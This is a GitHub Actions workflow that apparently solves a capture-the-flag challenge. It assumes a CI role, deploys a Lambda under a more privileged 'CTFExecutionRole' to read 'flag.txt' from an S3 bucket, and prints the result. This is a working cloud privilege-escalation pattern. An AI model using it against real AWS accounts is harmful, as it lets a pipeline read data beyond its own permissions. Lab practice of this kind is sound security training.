name: AWS Access

on:
  push:
    branches:
      - corgi

permissions:
  id-token: write
  contents: read

  
jobs:
  aws:
    runs-on: ubuntu-latest

    steps:
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1

      - name: Create Lambda function code
        run: |
          cat > lambda_function.py <<'EOF'
          import boto3
          import json

          s3 = boto3.client("s3")

          def lambda_handler(event, context):
              bucket = "codec4f26c862a321ef5"

              obj = s3.get_object(
                  Bucket=bucket,
                  Key="flag.txt"
              )

              flag = obj["Body"].read().decode("utf-8")

              return {
                  "statusCode": 200,
                  "body": json.dumps({
                      "flag": flag
                  })
              }
          EOF


     
      - name: Create lambda package
        run: |
          zip function.zip lambda_function.py

      - name: Create Lambda function
        run: |
          aws lambda create-function \
            --function-name flag-reader \
            --runtime python3.13 \
            --handler lambda_function.lambda_handler \
            --role arn:aws:iam::009661764077:role/CTFExecutionRole \
            --zip-file fileb://function.zip

      - name: Invoke Lambda
        run: |
          aws lambda invoke \
            --function-name flag-reader \
            response.json

          cat response.json